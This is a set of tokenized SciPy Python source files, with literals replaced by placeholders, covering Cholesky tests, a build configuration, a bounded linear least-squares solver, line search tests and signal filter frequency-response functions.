[ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT:1.0> ] ] ) <EOL> c = cholesky_banded ( ab , lower = True ) <EOL> lfac = zeros_like ( a ) <EOL> lfac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ <NUM_LIT:0> ] <EOL> lfac [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) ] = c [ <NUM_LIT:1> , : <NUM_LIT:3> ] <EOL> assert_array_almost_equal ( a , dot ( lfac , lfac . conj ( ) . T ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , True ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:1.0> ] ) <EOL> class TestOverwrite ( object ) : <EOL> def test_cholesky ( self ) : <EOL> assert_no_overwrite ( cholesky , [ ( <NUM_LIT:3> , <NUM_LIT:3> ) ] ) <EOL> def test_cho_factor ( self ) : <EOL> assert_no_overwrite ( cho_factor , [ ( <NUM_LIT:3> , <NUM_LIT:3> ) ] ) <EOL> def test_cho_solve ( self ) : <EOL> x = array ( [ [ <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> ] , [ - <NUM_LIT:1> , <NUM_LIT:2> , - <NUM_LIT:1> ] , [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:2> ] ] ) <EOL> xcho = cho_factor ( x ) <EOL> assert_no_overwrite ( lambda b : cho_solve ( xcho , b ) , [ ( <NUM_LIT:3> , ) ] ) <EOL> def test_cholesky_banded ( self ) : <EOL> assert_no_overwrite ( cholesky_banded , [ ( <NUM_LIT:2> , <NUM_LIT:3> ) ] ) <EOL> def test_cho_solve_banded ( self ) : <EOL> x = array ( [ [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> xcho = cholesky_banded ( x ) <EOL> assert_no_overwrite ( lambda b : cho_solve_banded ( ( xcho , False ) , b ) , <EOL> [ ( <NUM_LIT:3> , ) ] ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> from numpy . distutils . core import setup <EOL> from numpy . distutils . misc_util import Configuration <EOL> from numpy import get_include <EOL> def configuration ( parent_package = '<STR_LIT>' , top_path = None ) : <EOL> config = Configuration ( '<STR_LIT>' , parent_package , top_path ) <EOL> config . add_extension ( "<STR_LIT>" , <EOL> sources = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] , <EOL> include_dirs = [ '<STR_LIT:src>' ] + [ get_include ( ) ] , <EOL> ) <EOL> config . add_extension ( "<STR_LIT>" , <EOL> sources = [ "<STR_LIT>" , ] , <EOL> include_dirs = [ '<STR_LIT:src>' ] + [ get_include ( ) ] , <EOL> ) <EOL> config . add_data_dir ( '<STR_LIT>' ) <EOL> return config <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setup ( ** configuration ( top_path = '<STR_LIT>' ) . todict ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import numpy as np <EOL> from numpy . linalg import norm <EOL> from scipy . linalg import qr , solve_triangular <EOL> from scipy . sparse . linalg import lsmr <EOL> from scipy . optimize import OptimizeResult <EOL> from . givens_elimination import givens_elimination <EOL> from . common import ( <EOL> EPS , step_size_to_bound , find_active_constraints , in_bounds , <EOL> make_strictly_feasible , build_quadratic_1d , evaluate_quadratic , <EOL> minimize_quadratic_1d , CL_scaling_vector , reflective_transformation , <EOL> print_header_linear , print_iteration_linear , compute_grad , <EOL> regularized_lsq_operator , right_multiplied_operator ) <EOL> def regularized_lsq_with_qr ( m , n , R , QTb , perm , diag , copy_R = True ) : <EOL> """<STR_LIT>""" <EOL> if copy_R : <EOL> R = R . copy ( ) <EOL> v = QTb . copy ( ) <EOL> givens_elimination ( R , v , diag [ perm ] ) <EOL> abs_diag_R = np . abs ( np . diag ( R ) ) <EOL> threshold = EPS * max ( m , n ) * np . max ( abs_diag_R ) <EOL> nns , = np . nonzero ( abs_diag_R > threshold ) <EOL> R = R [ np . ix_ ( nns , nns ) ] <EOL> v = v [ nns ] <EOL> x = np . zeros ( n ) <EOL> x [ perm [ nns ] ] = solve_triangular ( R , v ) <EOL> return x <EOL> def backtracking ( A , g , x , p , theta , p_dot_g , lb , ub ) : <EOL> """<STR_LIT>""" <EOL> alpha = <NUM_LIT:1> <EOL> while True : <EOL> x_new , _ = reflective_transformation ( x + alpha * p , lb , ub ) <EOL> step = x_new - x <EOL> cost_change = - evaluate_quadratic ( A , g , step ) <EOL> if cost_change > - <NUM_LIT:0.1> * alpha * p_dot_g : <EOL> break <EOL> active = find_active_constraints ( x_new , lb , ub ) <EOL> if np . any ( active != <NUM_LIT:0> ) : <EOL> x_new , _ = reflective_transformation ( x + theta * alpha * p , lb , ub ) <EOL> x_new = make_strictly_feasible ( x_new , lb , ub , rstep = <NUM_LIT:0> ) <EOL> step = x_new - x <EOL> cost_change = - evaluate_quadratic ( A , g , step ) <EOL> return x , step , cost_change <EOL> def select_step ( x , A_h , g_h , c_h , p , p_h , d , lb , ub , theta ) : <EOL> """<STR_LIT>""" <EOL> if in_bounds ( x + p , lb , ub ) : <EOL> return p <EOL> p_stride , hits = step_size_to_bound ( x , p , lb , ub ) <EOL> r_h = np . copy ( p_h ) <EOL> r_h [ hits . astype ( bool ) ] *= - <NUM_LIT:1> <EOL> r = d * r_h <EOL> p *= p_stride <EOL> p_h *= p_stride <EOL> x_on_bound = x + p <EOL> r_stride_u , _ = step_size_to_bound ( x_on_bound , r , lb , ub ) <EOL> r_stride_l = ( <NUM_LIT:1> - theta ) * r_stride_u <EOL> r_stride_u *= theta <EOL> if r_stride_u > <NUM_LIT:0> : <EOL> a , b , c = build_quadratic_1d ( A_h , g_h , r_h , s0 = p_h , diag = c_h ) <EOL> r_stride , r_value = minimize_quadratic_1d ( <EOL> a , b , r_stride_l , r_stride_u , c = c ) <EOL> r_h = p_h + r_h * r_stride <EOL> r = d * r_h <EOL> else : <EOL> r_value = np . inf <EOL> p_h *= theta <EOL> p *= theta <EOL> p_value = evaluate_quadratic ( A_h , g_h , p_h , diag = c_h ) <EOL> ag_h = - g_h <EOL> ag = d * ag_h <EOL> ag_stride_u , _ = step_size_to_bound ( x , ag , lb , ub ) <EOL> ag_stride_u *= theta <EOL> a , b = build_quadratic_1d ( A_h , g_h , ag_h , diag = c_h ) <EOL> ag_stride , ag_value = minimize_quadratic_1d ( a , b , <NUM_LIT:0> , ag_stride_u ) <EOL> ag *= ag_stride <EOL> if p_value < r_value and p_value < ag_value : <EOL> return p <EOL> elif r_value < p_value and r_value < ag_value : <EOL> return r <EOL> else : <EOL> return ag <EOL> def trf_linear ( A , b , x_lsq , lb , ub , tol , lsq_solver , lsmr_tol , max_iter , <EOL> verbose ) : <EOL> m , n = A . shape <EOL> x , _ = reflective_transformation ( x_lsq , lb , ub ) <EOL> x = make_strictly_feasible ( x , lb , ub , rstep = <NUM_LIT:0.1> ) <EOL> if lsq_solver == '<STR_LIT>' : <EOL> QT , R , perm = qr ( A , mode = '<STR_LIT>' , pivoting = True ) <EOL> QT = QT . T <EOL> if m < n : <EOL> R = np . vstack ( ( R , np . zeros ( ( n - m , n ) ) ) ) <EOL> QTr = np . zeros ( n ) <EOL> k = min ( m , n ) <EOL> elif lsq_solver == '<STR_LIT>' : <EOL> r_aug = np . zeros ( m + n ) <EOL> auto_lsmr_tol = False <EOL> if lsmr_tol is None : <EOL> lsmr_tol = <NUM_LIT> * tol <EOL> elif lsmr_tol == '<STR_LIT>' : <EOL> auto_lsmr_tol = True <EOL> r = A . dot ( x ) - b <EOL> g = compute_grad ( A , r ) <EOL> cost = <NUM_LIT:0.5> * np . dot ( r , r ) <EOL> initial_cost = cost <EOL> termination_status = None <EOL> step_norm = None <EOL> cost_change = None <EOL> if max_iter is None : <EOL> max_iter = <NUM_LIT:100> <EOL> if verbose == <NUM_LIT:2> : <EOL> print_header_linear ( ) <EOL> for iteration in range ( max_iter ) : <EOL> v , dv = CL_scaling_vector ( x , g , lb , ub ) <EOL> g_scaled = g * v <EOL> g_norm = norm ( g_scaled , ord = np . inf ) <EOL> if g_norm < tol : <EOL> termination_status = <NUM_LIT:1> <EOL> if verbose == <NUM_LIT:2> : <EOL> print_iteration_linear ( iteration , cost , cost_change , <EOL> step_norm , g_norm ) <EOL> if termination_status is not None : <EOL> break <EOL> diag_h = g * dv <EOL> diag_root_h = diag_h ** <NUM_LIT:0.5> <EOL> d = v ** <NUM_LIT:0.5> <EOL> g_h = d * g <EOL> A_h = right_multiplied_operator ( A , d ) <EOL> if lsq_solver == '<STR_LIT>' : <EOL> QTr [ : k ] = QT . dot ( r ) <EOL> p_h = - regularized_lsq_with_qr ( m , n , R * d [ perm ] , QTr , perm , <EOL> diag_root_h , copy_R = False ) <EOL> elif lsq_solver == '<STR_LIT>' : <EOL> lsmr_op = regularized_lsq_operator ( A_h , diag_root_h ) <EOL> r_aug [ : m ] = r <EOL> if auto_lsmr_tol : <EOL> eta = <NUM_LIT> * min ( <NUM_LIT:0.5> , g_norm ) <EOL> lsmr_tol = max ( EPS , min ( <NUM_LIT:0.1> , eta * g_norm ) ) <EOL> p_h = - lsmr ( lsmr_op , r_aug , atol = lsmr_tol , btol = lsmr_tol ) [ <NUM_LIT:0> ] <EOL> p = d * p_h <EOL> p_dot_g = np . dot ( p , g ) <EOL> if p_dot_g > <NUM_LIT:0> : <EOL> termination_status = - <NUM_LIT:1> <EOL> theta = <NUM_LIT:1> - min ( <NUM_LIT> , g_norm ) <EOL> step = select_step ( x , A_h , g_h , diag_h , p , p_h , d , lb , ub , theta ) <EOL> cost_change = - evaluate_quadratic ( A , g , step ) <EOL> if cost_change < <NUM_LIT:0> : <EOL> x , step , cost_change = backtracking ( <EOL> A , g , x , p , theta , p_dot_g , lb , ub ) <EOL> else : <EOL> x = make_strictly_feasible ( x + step , lb , ub , rstep = <NUM_LIT:0> ) <EOL> step_norm = norm ( step ) <EOL> r = A . dot ( x ) - b <EOL> g = compute_grad ( A , r ) <EOL> if cost_change < tol * cost : <EOL> termination_status = <NUM_LIT:2> <EOL> cost = <NUM_LIT:0.5> * np . dot ( r , r ) <EOL> if termination_status is None : <EOL> termination_status = <NUM_LIT:0> <EOL> active_mask = find_active_constraints ( x , lb , ub , rtol = tol ) <EOL> return OptimizeResult ( <EOL> x = x , fun = r , cost = cost , optimality = g_norm , active_mask = active_mask , <EOL> nit = iteration + <NUM_LIT:1> , status = termination_status , <EOL> initial_cost = initial_cost ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> from numpy . testing import assert_ , assert_equal , assert_array_almost_equal , assert_array_almost_equal_nulp <EOL> import scipy . optimize . linesearch as ls <EOL> from scipy . optimize . linesearch import LineSearchWarning <EOL> import numpy as np <EOL> def assert_wolfe ( s , phi , derphi , c1 = <NUM_LIT> , c2 = <NUM_LIT> , err_msg = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> phi1 = phi ( s ) <EOL> phi0 = phi ( <NUM_LIT:0> ) <EOL> derphi0 = derphi ( <NUM_LIT:0> ) <EOL> derphi1 = derphi ( s ) <EOL> msg = "<STR_LIT>" % ( <EOL> s , phi0 , phi1 , derphi0 , derphi1 , err_msg ) <EOL> assert_ ( phi1 <= phi0 + c1 * s * derphi0 , "<STR_LIT>" + msg ) <EOL> assert_ ( abs ( derphi1 ) <= abs ( c2 * derphi0 ) , "<STR_LIT>" + msg ) <EOL> def assert_armijo ( s , phi , c1 = <NUM_LIT> , err_msg = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> phi1 = phi ( s ) <EOL> phi0 = phi ( <NUM_LIT:0> ) <EOL> msg = "<STR_LIT>" % ( s , phi0 , phi1 , err_msg ) <EOL> assert_ ( phi1 <= ( <NUM_LIT:1> - c1 * s ) * phi0 , msg ) <EOL> def assert_line_wolfe ( x , p , s , f , fprime , ** kw ) : <EOL> assert_wolfe ( s , phi = lambda sp : f ( x + p * sp ) , <EOL> derphi = lambda sp : np . dot ( fprime ( x + p * sp ) , p ) , ** kw ) <EOL> def assert_line_armijo ( x , p , s , f , ** kw ) : <EOL> assert_armijo ( s , phi = lambda sp : f ( x + p * sp ) , ** kw ) <EOL> def assert_fp_equal ( x , y , err_msg = "<STR_LIT>" , nulp = <NUM_LIT:50> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> assert_array_almost_equal_nulp ( x , y , nulp ) <EOL> except AssertionError as e : <EOL> raise AssertionError ( "<STR_LIT>" % ( e , err_msg ) ) <EOL> class TestLineSearch ( object ) : <EOL> def _scalar_func_1 ( self , s ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> p = - s - s ** <NUM_LIT:3> + s ** <NUM_LIT:4> <EOL> dp = - <NUM_LIT:1> - <NUM_LIT:3> * s ** <NUM_LIT:2> + <NUM_LIT:4> * s ** <NUM_LIT:3> <EOL> return p , dp <EOL> def _scalar_func_2 ( self , s ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> p = np . exp ( - <NUM_LIT:4> * s ) + s ** <NUM_LIT:2> <EOL> dp = - <NUM_LIT:4> * np . exp ( - <NUM_LIT:4> * s ) + <NUM_LIT:2> * s <EOL> return p , dp <EOL> def _scalar_func_3 ( self , s ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> p = - np . sin ( <NUM_LIT:10> * s ) <EOL> dp = - <NUM_LIT:10> * np . cos ( <NUM_LIT:10> * s ) <EOL> return p , dp <EOL> def _line_func_1 ( self , x ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> f = np . dot ( x , x ) <EOL> df = <NUM_LIT:2> * x <EOL> return f , df <EOL> def _line_func_2 ( self , x ) : <EOL> self . fcount += <NUM_LIT:1> <EOL> f = np . dot ( x , np . dot ( self . A , x ) ) + <NUM_LIT:1> <EOL> df = np . dot ( self . A + self . A . T , x ) <EOL> return f , df <EOL> def __init__ ( self ) : <EOL> self . scalar_funcs = [ ] <EOL> self . line_funcs = [ ] <EOL> self . N = <NUM_LIT:20> <EOL> self . fcount = <NUM_LIT:0> <EOL> def bind_index ( func , idx ) : <EOL> return lambda * a , ** kw : func ( * a , ** kw ) [ idx ] <EOL> for name in sorted ( dir ( self ) ) : <EOL> if name . startswith ( '<STR_LIT>' ) : <EOL> value = getattr ( self , name ) <EOL> self . scalar_funcs . append ( <EOL> ( name , bind_index ( value , <NUM_LIT:0> ) , bind_index ( value , <NUM_LIT:1> ) ) ) <EOL> elif name . startswith ( '<STR_LIT>' ) : <EOL> value = getattr ( self , name ) <EOL> self . line_funcs . append ( <EOL> ( name , bind_index ( value , <NUM_LIT:0> ) , bind_index ( value , <NUM_LIT:1> ) ) ) <EOL> def setUp ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> self . A = np . random . randn ( self . N , self . N ) <EOL> def scalar_iter ( self ) : <EOL> for name , phi , derphi in self . scalar_funcs : <EOL> for old_phi0 in np . random . randn ( <NUM_LIT:3> ) : <EOL> yield name , phi , derphi , old_phi0 <EOL> def line_iter ( self ) : <EOL> for name , f , fprime in self . line_funcs : <EOL> k = <NUM_LIT:0> <EOL> while k < <NUM_LIT:9> : <EOL> x = np . random . randn ( self . N ) <EOL> p = np . random . randn ( self . N ) <EOL> if np . dot ( p , fprime ( x ) ) >= <NUM_LIT:0> : <EOL> continue <EOL> k += <NUM_LIT:1> <EOL> old_fv = float ( np . random . randn ( ) ) <EOL> yield name , f , fprime , x , p , old_fv <EOL> def test_scalar_search_wolfe1 ( self ) : <EOL> c = <NUM_LIT:0> <EOL> for name , phi , derphi , old_phi0 in self . scalar_iter ( ) : <EOL> c += <NUM_LIT:1> <EOL> s , phi1 , phi0 = ls . scalar_search_wolfe1 ( phi , derphi , phi ( <NUM_LIT:0> ) , <EOL> old_phi0 , derphi ( <NUM_LIT:0> ) ) <EOL> assert_fp_equal ( phi0 , phi ( <NUM_LIT:0> ) , name ) <EOL> assert_fp_equal ( phi1 , phi ( s ) , name ) <EOL> assert_wolfe ( s , phi , derphi , err_msg = name ) <EOL> assert_ ( c > <NUM_LIT:3> ) <EOL> def test_scalar_search_wolfe2 ( self ) : <EOL> for name , phi , derphi , old_phi0 in self . scalar_iter ( ) : <EOL> s , phi1 , phi0 , derphi1 = ls . scalar_search_wolfe2 ( <EOL> phi , derphi , phi ( <NUM_LIT:0> ) , old_phi0 , derphi ( <NUM_LIT:0> ) ) <EOL> assert_fp_equal ( phi0 , phi ( <NUM_LIT:0> ) , name ) <EOL> assert_fp_equal ( phi1 , phi ( s ) , name ) <EOL> if derphi1 is not None : <EOL> assert_fp_equal ( derphi1 , derphi ( s ) , name ) <EOL> assert_wolfe ( s , phi , derphi , err_msg = "<STR_LIT>" % ( name , old_phi0 ) ) <EOL> def test_scalar_search_armijo ( self ) : <EOL> for name , phi , derphi , old_phi0 in self . scalar_iter ( ) : <EOL> s , phi1 = ls . scalar_search_armijo ( phi , phi ( <NUM_LIT:0> ) , derphi ( <NUM_LIT:0> ) ) <EOL> assert_fp_equal ( phi1 , phi ( s ) , name ) <EOL> assert_armijo ( s , phi , err_msg = "<STR_LIT>" % ( name , old_phi0 ) ) <EOL> def test_line_search_wolfe1 ( self ) : <EOL> c = <NUM_LIT:0> <EOL> smax = <NUM_LIT:100> <EOL> for name , f , fprime , x , p , old_f in self . line_iter ( ) : <EOL> f0 = f ( x ) <EOL> g0 = fprime ( x ) <EOL> self . fcount = <NUM_LIT:0> <EOL> s , fc , gc , fv , ofv , gv = ls . line_search_wolfe1 ( f , fprime , x , p , <EOL> g0 , f0 , old_f , <EOL> amax = smax ) <EOL> assert_equal ( self . fcount , fc + gc ) <EOL> assert_fp_equal ( ofv , f ( x ) ) <EOL> if s is None : <EOL> continue <EOL> assert_fp_equal ( fv , f ( x + s * p ) ) <EOL> assert_array_almost_equal ( gv , fprime ( x + s * p ) , decimal = <NUM_LIT> ) <EOL> if s < smax : <EOL> c += <NUM_LIT:1> <EOL> assert_line_wolfe ( x , p , s , f , fprime , err_msg = name ) <EOL> assert_ ( c > <NUM_LIT:3> ) <EOL> def test_line_search_wolfe2 ( self ) : <EOL> c = <NUM_LIT:0> <EOL> smax = <NUM_LIT:100> <EOL> for name , f , fprime , x , p , old_f in self . line_iter ( ) : <EOL> f0 = f ( x ) <EOL> g0 = fprime ( x ) <EOL> self . fcount = <NUM_LIT:0> <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( '<STR_LIT:ignore>' , LineSearchWarning ) <EOL> s , fc , gc , fv , ofv , gv = ls . line_search_wolfe2 ( f , fprime , x , p , <EOL> g0 , f0 , old_f , <EOL> amax = smax ) <EOL> assert_equal ( self . fcount , fc + gc ) <EOL> assert_fp_equal ( ofv , f ( x ) ) <EOL> assert_fp_equal ( fv , f ( x + s * p ) ) <EOL> if gv is not None : <EOL> assert_array_almost_equal ( gv , fprime ( x + s * p ) , decimal = <NUM_LIT> ) <EOL> if s < smax : <EOL> c += <NUM_LIT:1> <EOL> assert_line_wolfe ( x , p , s , f , fprime , err_msg = name ) <EOL> assert_ ( c > <NUM_LIT:3> ) <EOL> def test_line_search_armijo ( self ) : <EOL> c = <NUM_LIT:0> <EOL> for name , f , fprime , x , p , old_f in self . line_iter ( ) : <EOL> f0 = f ( x ) <EOL> g0 = fprime ( x ) <EOL> self . fcount = <NUM_LIT:0> <EOL> s , fc , fv = ls . line_search_armijo ( f , x , p , g0 , f0 ) <EOL> c += <NUM_LIT:1> <EOL> assert_equal ( self . fcount , fc ) <EOL> assert_fp_equal ( fv , f ( x + s * p ) ) <EOL> assert_line_armijo ( x , p , s , f , err_msg = name ) <EOL> assert_ ( c >= <NUM_LIT:9> ) <EOL> def test_armijo_terminate_1 ( self ) : <EOL> count = [ <NUM_LIT:0> ] <EOL> def phi ( s ) : <EOL> count [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return - s + <NUM_LIT> * s ** <NUM_LIT:2> <EOL> s , phi1 = ls . scalar_search_armijo ( phi , phi ( <NUM_LIT:0> ) , - <NUM_LIT:1> , alpha0 = <NUM_LIT:1> ) <EOL> assert_equal ( s , <NUM_LIT:1> ) <EOL> assert_equal ( count [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> assert_armijo ( s , phi ) <EOL> def test_wolfe_terminate ( self ) : <EOL> def phi ( s ) : <EOL> count [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return - s + <NUM_LIT> * s ** <NUM_LIT:2> <EOL> def derphi ( s ) : <EOL> count [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> return - <NUM_LIT:1> + <NUM_LIT> * <NUM_LIT:2> * s <EOL> for func in [ ls . scalar_search_wolfe1 , ls . scalar_search_wolfe2 ] : <EOL> count = [ <NUM_LIT:0> ] <EOL> r = func ( phi , derphi , phi ( <NUM_LIT:0> ) , None , derphi ( <NUM_LIT:0> ) ) <EOL> assert_ ( r [ <NUM_LIT:0> ] is not None , ( r , func ) ) <EOL> assert_ ( count [ <NUM_LIT:0> ] <= <NUM_LIT:2> + <NUM_LIT:2> , ( count , func ) ) <EOL> assert_wolfe ( r [ <NUM_LIT:0> ] , phi , derphi , err_msg = str ( func ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> import numpy <EOL> from numpy import ( atleast_1d , poly , polyval , roots , real , asarray , allclose , <EOL> resize , pi , absolute , logspace , r_ , sqrt , tan , log10 , <EOL> arctan , arcsinh , sin , exp , cosh , arccosh , ceil , conjugate , <EOL> zeros , sinh , append , concatenate , prod , ones , array ) <EOL> from numpy import mintypecode <EOL> import numpy as np <EOL> from scipy import special , optimize <EOL> from scipy . special import comb <EOL> from scipy . misc import factorial <EOL> from numpy . polynomial . polynomial import polyval as npp_polyval <EOL> import math <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class BadCoefficients ( UserWarning ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> abs = absolute <EOL> def findfreqs ( num , den , N ) : <EOL> """<STR_LIT>""" <EOL> ep = atleast_1d ( roots ( den ) ) + <NUM_LIT> <EOL> tz = atleast_1d ( roots ( num ) ) + <NUM_LIT> <EOL> if len ( ep ) == <NUM_LIT:0> : <EOL> ep = atleast_1d ( - <NUM_LIT:1000> ) + <NUM_LIT> <EOL> ez = r_ [ '<STR_LIT>' , <EOL> numpy . compress ( ep . imag >= <NUM_LIT:0> , ep , axis = - <NUM_LIT:1> ) , <EOL> numpy . compress ( ( abs ( tz ) < <NUM_LIT> ) & ( tz . imag >= <NUM_LIT:0> ) , tz , axis = - <NUM_LIT:1> ) ] <EOL> integ = abs ( ez ) < <NUM_LIT> <EOL> hfreq = numpy . around ( numpy . log10 ( numpy . max ( <NUM_LIT:3> * abs ( ez . real + integ ) + <EOL> <NUM_LIT> * ez . imag ) ) + <NUM_LIT:0.5> ) <EOL> lfreq = numpy . around ( numpy . log10 ( <NUM_LIT:0.1> * numpy . min ( abs ( real ( ez + integ ) ) + <EOL> <NUM_LIT:2> * ez . imag ) ) - <NUM_LIT:0.5> ) <EOL> w = logspace ( lfreq , hfreq , N ) <EOL> return w <EOL> def freqs ( b , a , worN = None , plot = None ) : <EOL> """<STR_LIT>""" <EOL> if worN is None : <EOL> w = findfreqs ( b , a , <NUM_LIT:200> ) <EOL> elif isinstance ( worN , int ) : <EOL> N = worN <EOL> w = findfreqs ( b , a , N ) <EOL> else : <EOL> w = worN <EOL> w = atleast_1d ( w ) <EOL> s = <NUM_LIT> * w <EOL> h = polyval ( b , s ) / polyval ( a , s ) <EOL> if plot is not None : <EOL> plot ( w , h ) <EOL> return w , h <EOL> def freqz ( b , a = <NUM_LIT:1> , worN = None , whole = False , plot = None ) : <EOL> """<STR_LIT>""" <EOL> b , a = map ( atleast_1d , ( b , a ) ) <EOL> if whole : <EOL> lastpoint = <NUM_LIT:2> * pi <EOL> else : <EOL> lastpoint = pi <EOL> if worN is None : <EOL> N = <NUM_LIT> <EOL> w = numpy . linspace ( <NUM_LIT:0> , lastpoint , N , endpoint = False ) <EOL> elif isinstance ( worN , int ) : <EOL> N = worN <EOL> w = numpy . linspace ( <NUM_LIT:0> , lastpoint , N , endpoint = False ) <EOL> else : <EOL> w = worN <EOL> w = atleast_1d ( w ) <EOL> zm1 = exp ( - <NUM_LIT> * w ) <EOL> h = polyval ( b [ : : - <NUM_LIT:1> ] , zm1 ) / polyval ( a [ : : - <NUM_LIT:1> ] , zm1 ) <EOL> if plot is not None : <EOL> plot ( w , h ) <EOL> return w , h <EOL> def group_delay ( system , w = None , whole = False ) : <EOL> r"""<STR_LIT>""" <EOL> if w is None : <EOL> w = <NUM_LIT> <EOL> if isinstance ( w , int ) : <EOL> if whole : <EOL> w = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> * pi , w , endpoint = False ) <EOL> else : <EOL> w = np . linspace ( <NUM_LIT:0> , pi , w , endpoint = False ) <EOL> w = np . atleast_1d ( w ) <EOL> b , a = map ( np . atleast_1d , system ) <EOL> c = np . convolve ( b , a [ : : - <NUM_LIT:1> ] ) <EOL> cr = c * np . arange ( c . size ) <EOL> z = np . exp ( - <NUM_LIT> * w ) <EOL> num = np . polyval ( cr [ : : - <NUM_LIT:1> ] , z ) <EOL> den = np . polyval ( c [ : : - <NUM_LIT:1> ] , z ) <EOL> singular = np . absolute ( den ) < <NUM_LIT:10> * EPSILON <EOL> if np . any ( singular ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" . <EOL> format ( "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" . format ( ws ) for ws in w [ singular ] ) ) <EOL> ) <EOL> gd = np . zeros_like ( w ) <EOL> gd [ ~ singular ] = np . real ( num [ ~ singular ] / den [ ~ singular ] ) - a . size + <NUM_LIT:1> <EOL> return w , gd <EOL> def _cplxreal ( z , tol = None ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> if z . size == <NUM_LIT:0> : <EOL> return z , z <EOL> elif z . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if tol is None : <EOL> tol = <NUM_LIT:100> * np . finfo ( ( <NUM_LIT:1.0> * z ) . dtype ) . eps <EOL> z = z [ np . lexsort ( ( abs ( z . imag ) , z . real ) ) ] <EOL> real_indices = abs ( z . imag ) <= tol * abs ( z ) <EOL> zr = z [ real_indices ] . real <EOL> if len ( zr ) == len ( z ) : <EOL> return array ( [ ] ) , zr <EOL> z = z [ ~ real_indices ] <EOL> zp = z [ z . imag > <NUM_LIT:0> ] <EOL> zn = z [ z . imag < <NUM_LIT:0> ] <EOL> if len ( zp ) != len ( zn ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> same_real = np . diff ( zp . real ) <= tol * abs ( zp [ : - <NUM_LIT:1> ] ) <EOL> diffs = numpy . diff ( concatenate ( ( [ <NUM_LIT:0> ] , same_real , [ <NUM_LIT:0> ] ) ) ) <EOL> run_starts = numpy . where ( diffs > <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> run_stops = numpy . where ( diffs < <NUM_LIT:0> ) [ <NUM_LIT:0> ] <EOL> for i in range ( len ( run_starts ) ) : <EOL> start = run_starts [ i ] <EOL> stop = run_stops [ i ] + <NUM_LIT:1> <EOL> for chunk in ( zp [ start : stop ] , zn [ start : stop ] ) : <EOL> chunk [ ... ] = chunk [ np . lexsort ( [ abs ( chunk . imag ) ] ) ] <EOL> if any ( abs ( zp - zn . conj ( ) ) > tol * abs ( zn ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> zc = ( zp + zn . conj ( ) ) / <NUM_LIT:2> <EOL> return zc , zr <EOL> def _cplxpair ( z , tol = None ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> if z . size == <NUM_LIT:0> or np . isrealobj ( z ) : <EOL> return np . sort ( z ) <EOL> if z . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> zc , zr = _cplxreal ( z , tol ) 